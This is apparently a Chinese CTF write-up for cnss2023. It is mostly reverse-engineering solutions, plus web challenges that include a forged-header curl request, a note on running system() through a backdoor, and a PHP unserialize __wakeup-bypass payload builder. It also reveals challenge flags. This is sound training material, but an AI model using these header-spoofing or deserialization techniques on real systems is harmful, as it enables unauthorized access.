cnss2023

Web

[Baby] SignIn

查看源代码,script.js文件中有一段document.getElementById('flag').addEventListener('click', function()下面是一段jsfuck混淆

https://enkhee-osiris.github.io/Decoder-JSFuck/ 得到flag

[Baby] Backdoor

post传system()执行系统命令,找到flag

[Baby] Webpack

https://www.cnblogs.com/guowenrui/p/17023732.html 参考的这个文章

安装nodejs 用reverse-sourcemap .map文件还原找到flag

[Easy] Leak

.swp备份文件 vim -r还原得到flag

[Easy] ezhttp

传参的时候有些问题,像传host还有referer,可能是我这边安装的burp有问题,上网上查了一下发现curl也能传很多参数

# One request that satisfies every check of the challenge at once: custom HTTP method,
# WeChat User-Agent, Referer, X-Forwarded-For, Host, JSON body, cookie and Basic auth.
# Every one of these values is chosen by the client, so a server that gates access on
# them is trusting caller-controlled input.
curl -X CNSS \
  -A "Mozilla/5.0 (Linux; Android 8.1.0; Redmi 5 Build/OPM1.171019.026; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.99 XWEB/4313 MMWEBSDK/20220604 Mobile Safari/537.36 MMWEBID/8603 MicroMessenger/8.0.24.2180(0x28001851) WeChat/arm64 Weixin NetType/WIFI Language/zh_CN ABI/arm64" \
  -H "Referer: cnss.io" \
  -H "X-Forwarded-For: 127.0.0.1" \
  -H "Host: uestc.edu.cn" \
  -H "Content-Type: application/json" \
  -d "{\"name\": \"nyyyddddn\",\"password\" : \"123456\"}" \
  -b "name=nyyyddddn;password=123456" \
  -u nyyyddddn:123456 \
  http://124.221.34.13:50005/Index

[Easy] ezunserialize

fssmsl网页那显示错误是unicode里面的LRI PDI RLO的原因,在ide里面没有这种问题,传参的时候转url编码传就行了,只需要改对象数量绕过__wakeup就拿到flag了

<?php
// Suppress all error output, print this file's own source, then pull in flag.php
// (presumably the file that defines $flag, which CNSS::__destruct() echoes).
error_reporting(0);
show_source(__FILE__);
include "flag.php";

/**
 * Challenge class: __destruct() echoes $flag only while all three properties still hold
 * their declared defaults, and __wakeup() overwrites all three whenever it runs.
 *
 * NOTE(review): the $i_want2_say literals contain invisible Unicode bidirectional control
 * characters around "fssmsl" (the write-up identifies them as RLO, LRI and PDI), so the text a
 * browser or editor renders is not the byte sequence PHP compares. Copy the literal as bytes.
 */
class CNSS
{
    public $username = 'admin';
    // Contains invisible bidi controls; must match the literal in __destruct() byte for byte.
    private $i_want2_say = '‮⁦fssmsl⁩⁦i_like_web';
    protected $password = 'ctf';
    
    // Resets every property to a value that fails the __destruct() check.
    function __wakeup()
    {
        $this->username = 'guest';
        $this->i_want2_say = 'i_like_web';
        $this->password = '123456';
        echo "<br/> wake up! <br/>";
    }
    
    // Runs when the object is destroyed; prints the flag only if no property was changed.
    function __destruct()
    {
        echo "destruct<br />";
        // Strict comparisons; the third operand is the bidi-laden literal, not plain 'i_like_web'.
        if ($this->username === 'admin' && $this->password === 'ctf' && $this->i_want2_say === '‮⁦fssmsl⁩⁦i_like_web') { //wtf
            global $flag;
            echo $flag;
        } else
            echo "you are 2 baby la<br/>";
    }
}

// Build the payload: serialize a default-valued object, then raise the declared property
// count from 3 to 4 so it no longer matches the three properties that follow.
// NOTE(review): the write-up relies on that mismatch making unserialize() skip __wakeup().
// This is a behaviour of older PHP releases only; presumably the challenge server runs one.
// The robust fix on the server side is to never pass request data to unserialize().
$aa = new CNSS();
$ss = serialize($aa);
$ss=str_replace('"CNSS":3','"CNSS":4',$ss);
// URL-encode the result: private/protected property names are serialized with NUL bytes and
// the value carries invisible bidi characters, neither of which survives copy-paste.
echo urlencode($ss);

Re

[Baby] Welcome to Reverse World!

main函数那,一打开就有flag了

; Attributes: bp-based frame

; int __cdecl main(int argc, const char **argv, const char **envp)
; Excerpt of the crackme's main (the listing stops at the jnz): reads one token with
; scanf("%s") and memcmp()s it against the flag string embedded in the binary.
public main
main proc near

; Input buffer, located at rbp-40h.
; NOTE(review): the "%s" format carries no field width, so scanf can write past this
; buffer when the input is long enough.
Str= byte ptr -40h

push    rbp
mov     rbp, rsp
sub     rsp, 60h
call    __main
lea     rax, [rbp+Str]
mov     rdx, rax
lea     rcx, Format     ; "%s"
call    scanf
lea     rax, [rbp+Str]
mov     rcx, rax        ; Str
call    strlen
; The memcmp length is strlen(input), not the length of the flag, so only as many bytes
; as the user typed are compared: a correct prefix already compares equal.
mov     rdx, rax
lea     rax, [rbp+Str]
mov     r8, rdx         ; Size
lea     rdx, flag       ; "cnss{1t_s3ems_l1ke_Y0u_c4n_us3_IDA_n0w!"...
mov     rcx, rax        ; Buf1
call    memcmp
test    eax, eax
jnz     short loc_401587

[Baby] Find me

; Attributes: bp-based frame

; int __cdecl main(int argc, const char **argv, const char **envp)
; Prints five hint strings with puts and returns; it takes no input. The last hint
; contains the final flag fragment in clear text; the other fragments are not printed here.
public main
main proc near
push    rbp
mov     rbp, rsp
sub     rsp, 20h
call    __main
lea     rcx, aOopsWhereIsMyF ; "Oops! Where is my flag?"
call    puts
; Three hints naming the IDA views to use: Strings, Functions, Xref.
lea     rcx, aLearnAboutStri ; "Learn about Strings and you can see the"...
call    puts
lea     rcx, aLearnAboutFunc ; "Learn about Functions and you can see t"...
call    puts
lea     rcx, aLearnAboutXref ; "Learn about Xref and you can see the th"...
call    puts
lea     rcx, aTheLastPartIsI ; "The last part is _ID4_N0w!}"
call    puts
add     rsp, 20h
pop     rbp
retn
main endp

根据提示,搜字符串cnss{ ,alt+t匹配大小写,找到第一部分cnss{W0w!Y0u',0

查找函数,发现第二部分是函数名_Comp1et3ly_Uns7and_

交叉引用puts找到第三部分

; Attributes: bp-based frame

; Emits the ten characters "h0w_t0_us3" one putchar call at a time, so this flag fragment
; exists only as immediate operands and never shows up in the Strings view. It then prints
; a hint with puts and returns the constant 1BF52h.
public sub736
sub736 proc near
push    rbp
mov     rbp, rsp
sub     rsp, 20h
mov     ecx, 68h ; 'h'  ; Character
call    putchar
mov     ecx, 30h ; '0'  ; Character
call    putchar
mov     ecx, 77h ; 'w'  ; Character
call    putchar
mov     ecx, 5Fh ; '_'  ; Character
call    putchar
mov     ecx, 74h ; 't'  ; Character
call    putchar
mov     ecx, 30h ; '0'  ; Character
call    putchar
mov     ecx, 5Fh ; '_'  ; Character
call    putchar
mov     ecx, 75h ; 'u'  ; Character
call    putchar
mov     ecx, 73h ; 's'  ; Character
call    putchar
mov     ecx, 33h ; '3'  ; Character
call    putchar
lea     rcx, Buffer     ; "Find out which function refer to me!"
call    puts
; Return value of the function.
mov     eax, 1BF52h
add     rsp, 20h
pop     rbp
retn

拼接获得flag cnss{W0w!Y0u_Comp1et3ly_Uns7and_h0w_t0_us3_ID4_N0w!}

[Easy] 回レ! 雪月花

// Hex-Rays output of the checker: XOR the input with 0x11, run encode() over every
// 4-byte sliding window, then compare the first 32 bytes against cipher[].
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int i; // [rsp+Ch] [rbp-34h]
  int j; // [rsp+Ch] [rbp-34h]
  int k; // [rsp+Ch] [rbp-34h]
  char v7[40]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v8; // [rsp+38h] [rbp-8h]

  // presumably the stack-protector canary load -- confirm against the epilogue
  v8 = __readfsqword(0x28u);
  puts("Please input your flag:");
  // NOTE(review): "%s" has no field width while v7 holds 40 bytes, so a longer input
  // is written past the end of the buffer.
  __isoc99_scanf("%s", v7);
  // Layer 1: always transforms bytes 0..31, whatever length was actually read.
  for ( i = 0; i <= 31; ++i )
    v7[i] ^= 0x11u;
  // Layer 2: windows start at 0..28 and overlap by three bytes, so each pass rewrites
  // bytes that the next pass reads again; inverting it means walking j from 28 down to 0.
  for ( j = 0; j <= 28; ++j )
    encode(&v7[j], &v7[j + 1], &v7[j + 2], &v7[j + 3]);
  // Layer 3: byte-wise comparison that stops at the first mismatch.
  for ( k = 0; k <= 31 && v7[k] == cipher[k]; ++k )
    ;
  // k reaches 32 only when all 32 bytes matched.
  if ( k == 32 )
    puts("Correct!");
  else
    puts("Wrong!");
  return 0;
}

这种逆向题倒过来看会很直观,分三层,把输入的字符串异或上0x11u,然后encode一遍,和cipher判断,一致获得flag

// Mixes four bytes in place: each output byte is built from bit fields of two inputs and
// (except the first) XOR-chained with the previously computed output byte.
// All four results are computed from the original inputs before anything is written back.
// Returns a4.
_BYTE *__fastcall encode(_BYTE *a1, _BYTE *a2, _BYTE *a3, _BYTE *a4)
{
  _BYTE *result; // rax
  char v5; // [rsp+2Ch] [rbp-4h]
  char v6; // [rsp+2Dh] [rbp-3h]
  char v7; // [rsp+2Eh] [rbp-2h]
  char v8; // [rsp+2Fh] [rbp-1h]

  // Each expression is truncated to one byte when stored into the char temporary.
  // v5: bit 0 of a1 moved to bit 7, combined with a2 shifted right by one.
  v5 = (*a1 << 7) | (*a2 >> 1);
  // v6: a4 shifted right by two combined with the low two bits of a3 in bits 6-7, XOR v5.
  v6 = ((*a4 >> 2) | (*a3 << 6)) ^ v5;
  // v7: a1 shifted right by one combined with bit 0 of a2 in bit 7, XOR v6.
  v7 = ((*a1 >> 1) | (*a2 << 7)) ^ v6;
  // v8: a3 shifted right by two combined with the low two bits of a4 in bits 6-7, XOR v7.
  v8 = ((*a3 >> 2) | (*a4 << 6)) ^ v7;
  *a1 = v5;
  *a2 = v6;
  *a3 = v7;
  result = a4;
  *a4 = v8;
  return result;
}

看了半天了不太会,去掉异或之后其他的不知道怎么做了

搜了一下发现这好像是往年题,做法是把异或去掉后,根据a1 a2 a3 a4的顺序倒着做一遍就好了

#include <cstdio>

// Bytes the solver inverts in place (presumably copied from the binary's cipher[]):
// 32 values followed by a 0 terminator.
int c[] = {
	 63, 143, 163, 188, 141,  39, 122, 103,
	226,   3, 162, 224, 172, 234, 149, 139,
	163, 237, 204, 182,  50, 140, 148,  82,
	130, 138,  20, 198, 245, 174, 104, 115,
	0
};
int main()
{
	// encode() was applied to windows 0..28 in ascending order, so undo them from the
	// last window back to the first.
	for (int pos = 28; pos >= 0; --pos)
	{
		int *w = &c[pos];

		// Strip the XOR chaining, last-written byte first.
		w[3] ^= w[2];
		w[2] ^= w[1];
		w[1] ^= w[0];

		// Reassemble the four original bytes from the bit fields encode() scattered.
		const int a1 = ((w[2] & 0x7F) << 1) | (w[0] >> 7);
		const int a2 = ((w[0] & 0x7F) << 1) | (w[2] >> 7);
		const int a3 = ((w[3] & 0x3F) << 2) | (w[1] >> 6);
		const int a4 = ((w[1] & 0x3F) << 2) | (w[3] >> 6);

		w[0] = a1;
		w[1] = a2;
		w[2] = a3;
		w[3] = a4;
	}

	// Remove the outer XOR layer and print the 32 recovered characters.
	int k = 0;
	while (k < 32)
	{
		putchar(c[k] ^ 0x11);
		++k;
	}
	puts("");
	return 0;
}

[Easy] 邪王真眼

encode里每3个字节编码成4个字符,然后还有一个alpha的索引表,应该是base64,只是替换了索引表

// Base64-shaped encoder: every 3 input bytes become 4 output characters looked up in
// alpha[], with 61 ('=') written as padding for a short final group.
//   a1: input buffer      a2: input length
//   a3: output buffer     a4: optional; receives the output length when non-NULL
// Returns 0xFFFFFFFF when a1 is NULL or a2 is 0, otherwise 0.
// NOTE(review): there is no output-capacity parameter and a3 is not NULL-checked; the
// caller has to provide at least 8 * (padded length) / 6 bytes.
__int64 __fastcall encode(char *a1, int a2, _BYTE *a3, int *a4)
{
  int v5; // esi
  int v6; // esi
  int v7; // esi
  int v8; // [rsp+30h] [rbp-20h]
  int v9; // [rsp+34h] [rbp-1Ch]
  int i; // [rsp+3Ch] [rbp-14h]
  int v12; // [rsp+4Ch] [rbp-4h]
  char *v13; // [rsp+70h] [rbp+20h]

  v13 = a1;
  if ( !a1 || !a2 )
    return 0xFFFFFFFFi64;
  // v12 = number of bytes missing to reach a multiple of 3 (0, 1 or 2).
  v12 = 0;
  if ( a2 % 3 )
    v12 = 3 - a2 % 3;
  // v9 = padded input length, v8 = resulting output length.
  v9 = a2 + v12;
  v8 = 8 * (a2 + v12) / 6;
  for ( i = 0; i < v9; i += 3 )
  {
    // NOTE(review): as decompiled, *v13 is a plain char, so a byte >= 0x80 would give a
    // negative index here; possibly a decompiler typing artifact -- confirm in the disassembly.
    *a3 = alpha[*v13 >> 2];
    // Last group and padding is needed.
    if ( a2 + v12 - 3 == i && v12 )
    {
      // cmove_bits is not shown on this page; presumably it extracts/moves a bit field -- confirm.
      if ( v12 == 1 )
      {
        // Two real input bytes: three alphabet characters, then one '='.
        v5 = (char)cmove_bits((unsigned __int8)*v13, 6i64, 2i64);
        a3[1] = alpha[v5 + (char)cmove_bits((unsigned __int8)v13[1], 0i64, 4i64)];
        a3[2] = alpha[(char)cmove_bits((unsigned __int8)v13[1], 4i64, 2i64)];
        a3[3] = 61;
      }
      else if ( v12 == 2 )
      {
        // One real input byte: two alphabet characters, then two '='.
        a3[1] = alpha[(char)cmove_bits((unsigned __int8)*v13, 6i64, 2i64)];
        a3[2] = 61;
        a3[3] = 61;
      }
    }
    else
    {
      // Full group: three input bytes, four alphabet characters.
      v6 = (char)cmove_bits((unsigned __int8)*v13, 6i64, 2i64);
      a3[1] = alpha[v6 + (char)cmove_bits((unsigned __int8)v13[1], 0i64, 4i64)];
      v7 = (char)cmove_bits((unsigned __int8)v13[1], 4i64, 2i64);
      a3[2] = alpha[v7 + (char)cmove_bits((unsigned __int8)v13[2], 0i64, 6i64)];
      a3[3] = alpha[v13[2] & 0x3F];
    }
    // Advance: 4 characters written, 3 bytes consumed.
    a3 += 4;
    v13 += 3;
  }
  if ( a4 )
    *a4 = v8;
  return 0i64;
}

用这个网站http://web.chacuo.net/netbasex把alpha索引表加上去,解密UR3oWS5E0G03tRibWRrR0cEx拿到flag

[Mid] 恭喜你获得了flag提现机会!

ida中patch program修改然后直接call outputflag就拿到flag了

[Mid] Pyfuck

x = [~((((~((~((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),(~((~((~(((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))),~((((~(((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),~((((~(((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),~(((((~((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),~((~((~(((~((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))),((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),~((~(((((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))),~(((~((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),((((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))),(~(((~(((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))),~((~((((~((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))),~(((~((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),~(((~(((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),((~((((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),~((((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),~(((~((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),((~((~(((~(((~(([]<[]))<<(-~([]<[])))
<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),~((~((~(((~((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))),~(((~(((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),((~((((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),(~((~((~(((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))),~(((~((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),~((~(((~(((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))),((((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))),~((~((~((~((~((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))),~(((~(((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),~((~((((~((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))),(~(((~(((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))),~((~(((~((~((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))]
# Read the candidate flag; only inputs of exactly 31 characters are checked at all.
flag = input("flag: ")
if len(flag) == 31:
	for i in range(len(flag)):
		# The obfuscated right-hand operand of ^ is a constant: []<[] is False (0) and -~0 is 1,
		# so it reduces to ((~((~(1<<1))<<1))<<1)<<1 == 20. Each character XOR 20 must equal x[i],
		# which means the flag is recovered as chr(x[i] ^ 20).
		if (ord(flag[i])^((~((~(((-~([]<[]))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))!=x[i]:
			print("Wrong")
			exit()
	print("Correct")
else:
	print("Wrong")

这个挺有意思的,[]<[]产生一个0(False),-~0就是1,然后用各种位运算拼出数字。只需要把x[]的每一项异或上if判断中的

((~((~(((-~([]<[]))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))

(这个表达式的值是20),然后chr输出就拿到flag了

[Mid] diannaobaozhale

; Prints "cnss{", then a run of generated characters, then "}".
; var_5 holds the character to print next, var_4 is the loop counter.
main            proc near

var_5           = byte ptr -5
var_4           = dword ptr -4

; __unwind {
        endbr64
        push    rbp
        mov     rbp, rsp
        sub     rsp, 10h
; NOTE(review): the listing shows 63 without an h suffix; the solver below treats the seed
; as 63h ('c'), so this is presumably a transcription slip -- confirm in IDA.
        mov     [rbp+var_5], 63
; Fixed prefix: 63h 6Eh 73h 73h 7Bh = "cnss{".
        mov     edi, 63h
        call    _putchar
        mov     edi, 6Eh
        call    _putchar
        mov     edi, 73h
        call    _putchar
        mov     edi, 73h
        call    _putchar
        mov     edi, 7Bh
        call    _putchar
        mov     [rbp+var_4], 0
        jmp     short loc_11B0
; ---------------------------------------------------------------------------

; Loop body: print var_5, then var_5 = (var_5 + 2) XOR 1, then counter++.
loc_1194:
        movsx   eax, [rbp+var_5]
        mov     edi, eax        ;
        call    _putchar
        movzx   eax, [rbp+var_5]
        add     eax, 2
        xor     eax, 1
        mov     [rbp+var_5], al
        add     [rbp+var_4], 1

; Loop condition: repeat while var_4 <= 9. The counter starts at 0, so the body runs for
; 0..9 inclusive, i.e. ten times.
loc_11B0:
        cmp     [rbp+var_4], 9
        jle     short loc_1194
; Closing "}" (7Dh), then return 0.
        mov     edi, 7Dh
        call    _putchar
        mov     eax, 0
        leave
        retn
; }
main            endp

__putchar输出字符

63h 6Eh 73h 73h 7Bh 对应cnss{

cmp [rbp+var_4], 9 jle short loc_1194以及add [rbp+var_4], 1

就是一个九次的循环

7Dh对应 }

#include <cstdio>

int main()
{
	// Fixed prefix emitted by the five leading putchar calls in the disassembly.
	fputs("cnss{", stdout);

	// Ten generated characters: start from 'c' and apply the loop body's update
	// (add 2, then flip bit 0) after each one is printed.
	char cur = 'c';
	int remaining = 10;
	while (remaining-- > 0)
	{
		putchar(cur);
		cur = (char)((cur + 2) ^ 1);
	}

	fputs("}\n", stdout);
	return 0;
}

拿到flag cnss{cdghklopst}

[Hard] Shino 的心跳大冒险

玩了一下发现flag被挡住了,看目录里面有好几个Yuri关键词,搜索了一下发现

https://github.com/rinkako/YuriAVGEngine这个项目

看了下简介,这个游戏引擎是基于虚拟机的,有个main.sil是存放游戏逻辑的中间码的,但是被加密了,看起来像是base64编码,用在线的base64解码后发现是乱码

继续翻项目,发现有个yuriricli是用来编译项目的,下载源码看看里面是怎么加密的

using System.Text;


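namespace Yuri.YuriInterpreter
{
    /// <summary>
    /// Encrypts and decrypts strings with DES (provider defaults: CBC mode, PKCS7 padding)
    /// and transports the ciphertext as Base64.
    /// </summary>
    /// <remarks>
    /// NOTE(review): this is obfuscation rather than protection. DES has a 56-bit key, the IV
    /// is a constant compiled into the assembly, the key is whatever string the caller embeds,
    /// and nothing authenticates the ciphertext. Algorithm and IV are left unchanged so that
    /// data encrypted earlier still decrypts; anything that needs real confidentiality should
    /// use an authenticated cipher with a random nonce and a key that is not shipped in the binary.
    /// </remarks>
    public static class YuriEncryptor
    {
        // Fixed IV shared by both directions; changing it would break existing ciphertext.
        private static readonly byte[] FixedIV = { 0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF };

        /// <summary>
        /// DES-encrypts a string and returns the ciphertext as Base64.
        /// </summary>
        /// <param name="data">Text to encrypt; null or empty yields an empty string.</param>
        /// <param name="key">Symmetric key; its UTF-8 bytes are used directly as the DES key, so it must encode to 8 bytes.</param>
        /// <returns>Base64 text of the ciphertext, or an empty string for empty input.</returns>
        public static string EncryptString(string data, string key)
        {
            if (string.IsNullOrEmpty(data))
            {
                return string.Empty;
            }
            byte[] keyBytes = Encoding.UTF8.GetBytes(key);
            // using-blocks release the provider and both streams even when CreateEncryptor
            // or the write throws; the original never disposed the DES provider.
            using (DES provider = new DESCryptoServiceProvider())
            using (MemoryStream buffer = new MemoryStream())
            using (CryptoStream cs = new CryptoStream(buffer, provider.CreateEncryptor(keyBytes, FixedIV), CryptoStreamMode.Write))
            {
                byte[] plain = Encoding.UTF8.GetBytes(data);
                cs.Write(plain, 0, plain.Length);
                // Emit the final padded block before reading the buffer.
                cs.FlushFinalBlock();
                return Convert.ToBase64String(buffer.ToArray());
            }
        }

        /// <summary>
        /// Decrypts Base64 text produced by <see cref="EncryptString"/>.
        /// </summary>
        /// <param name="data">Base64 ciphertext; must not be null or empty.</param>
        /// <param name="key">Symmetric key; must be the same 8-byte key used for encryption.</param>
        /// <returns>The decrypted text, decoded as UTF-8.</returns>
        /// <exception cref="Exception">Thrown with "data is empty" when <paramref name="data"/> is null or empty.</exception>
        public static string DecryptString(string data, string key)
        {
            if (string.IsNullOrEmpty(data))
            {
                throw new Exception("data is empty");
            }
            byte[] keyBytes = Encoding.UTF8.GetBytes(key);
            using (DES provider = new DESCryptoServiceProvider())
            using (MemoryStream buffer = new MemoryStream())
            using (CryptoStream cs = new CryptoStream(buffer, provider.CreateDecryptor(keyBytes, FixedIV), CryptoStreamMode.Write))
            {
                byte[] cipher = Convert.FromBase64String(data);
                cs.Write(cipher, 0, cipher.Length);
                // Padding is validated and removed when the final block is flushed.
                cs.FlushFinalBlock();
                return Encoding.UTF8.GetString(buffer.ToArray());
            }
        }

    }
}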

这个是des加密的,下面还有解密函数,就在窗口load那调用了一下

/// <summary>
/// Form-load handler used as a one-off decryptor: reads main.sil line by line, decrypts
/// each line with YuriEncryptor.DecryptString and writes the plaintext to the console.
/// </summary>
private void CPMainForm_Load(object sender, EventArgs e)
{
    // Key passed to the DES decryption; it is embedded here as a literal.
    const string scenarioKey = "yurayuri";
    string scenarioPath = "D:\\dw_file\\cnss\\CNSS Rev Challenge\\Scenario\\main.sil";

    // Each line of the file is an independent Base64 ciphertext.
    foreach (string cipherLine in File.ReadLines(scenarioPath))
    {
        Console.WriteLine(YuriEncryptor.DecryptString(cipherLine, scenarioKey));
    }

}

解密出来的文本是这样的

main_0@NOP^^^^main_0@act_bgm#main_1@act_bg#main_2@act_se#main_4@act_dialog#main_6@act_cstand#main_7@act_se#main_9@act_dialog#main_11@act_deletecstand#main_12@act_se#main_14@act_dialog#main_16@act_se#main_18@act_dialog#main_20@act_stopbgm#main_21@act_cstand#main_22@act_se#main_24@act_dialog#main_26@act_bgm#main_27@act_se#main_29@act_dialog#main_31@act_se#main_33@act_dialog#main_35@act_se#main_37@act_dialog#main_39@act_deletecstand#main_40@act_bg#main_41@act_se#main_43@act_dialog#main_45@act_se#main_47@act_dialog#main_49@act_se#main_51@act_dialog#main_53@act_se#main_55@act_dialog#main_57@act_se#main_59@act_dialog#main_61@act_se#main_63@act_dialog#main_65@act_se#main_66@act_bg#main_67@act_wait#main_68@act_bg#main_69@act_cstand#main_71@act_dialog#main_73@act_deletecstand#main_74@act_se#main_75@act_bg#main_76@act_wait#main_77@act_se#main_78@act_bg#main_79@act_wait#main_80@act_bg#main_81@act_stopbgm#main_82@act_cstand#main_83@act_se#main_85@act_dialog#main_87@act_bg#main_88@act_bgm#main_89@act_deletecstand#main_90@act_cstand#main_91@act_se#main_93@act_dialog#main_95@act_se#main_97@act_dialog#main_99@act_se#main_101@act_dialog#main_103@act_se#main_105@act_dialog#main_107@act_se#main_109@act_dialog#main_111@act_se#main_113@act_dialog#main_115@act_se#main_117@act_dialog#main_119@act_se#main_121@act_dialog#main_123@act_se#main_125@act_dialog#main_127@act_se#main_129@act_dialog#main_131@act_deletecstand#main_132@act_picture#main_133@act_se#main_135@act_dialog#main_137@act_se#main_139@act_dialog#main_142@act_dialog#main_144@act_deletepicture#main_145@act_se#main_147@act_dialog#main_150@act_dialog#main_152@act_shutdown^^0^^109097105110
main_0@act_bgm^filename@050053046109112051#vol@052057056^^main_1@act_bg^^^0^^048045048
main_1@act_bg^id@049#filename@100111111114046106112103#x@#y@#opacity@#xscale@#yscale@#ro@045050053^^main_2@act_se^^^0^^049045048
main_2@act_se^filename@121117107117109111095048048048049046109112051#vol@056048048^^main_4@act_dialog^^^0^^050045048
main_4@act_dialog^^^main_6@act_cstand^^^0^^083104105110111058227128142230136145229143171032083104105110111239188140230152175228184128229144141229136154229136154229133165229173166231148181229173144231165158230138128229164167229173166231154132232174161231174151230156186229176143231153189227128130227128143013010035048
main_6@act_cstand^id@048#name@083104105110111#face@049#x@049051048#y@049051048#loc@^^main_7@act_se^^^0^^054045048
main_7@act_se^filename@121117107117109111095048048048050046109112051#vol@056048048^^main_9@act_dialog^^^0^^055045048
main_9@act_dialog^^^main_11@act_deletecstand^^^0^^083104105110111058032227128142232191153230152175230136145239188140233149191231155184232141137231142135239188140228189134229175140230156137231165158231167152230132159227128130227128143013010035048
main_11@act_deletecstand^id@048^^main_12@act_se^^^0^^049049045048
main_12@act_se^filename@121117107117109111095048048048051046109112051#vol@056048048^^main_14@act_dialog^^^0^^049050045048
main_14@act_dialog^^^main_16@act_se^^^0^^083104105110111058032227128142231142176229156168230136145230173163231171153229156168230160161233151168229143163227128130228187164228186186229144145229190128231154132229164167229173166231148159230180187230136145230157165229149166239188129227128143013010035048
main_16@act_se^filename@121117107117109111095048048048052046109112051#vol@056048048^^main_18@act_dialog^^^0^^049054045048
main_18@act_dialog^^^main_20@act_stopbgm^^^0^^083104105110111058032227128142231173137231173137239188140233130163230152175228187128228185136239188159227128143013010035048
main_20@act_stopbgm^^^main_21@act_cstand^^^0^^050048045048
main_21@act_cstand^id@049#name@083104105110111#face@050#x@049051048#y@049051048#loc@^^main_22@act_se^^^0^^050049045048
main_22@act_se^filename@121117107117109111095048048048053046109112051#vol@056048048^^main_24@act_dialog^^^0^^050050045048
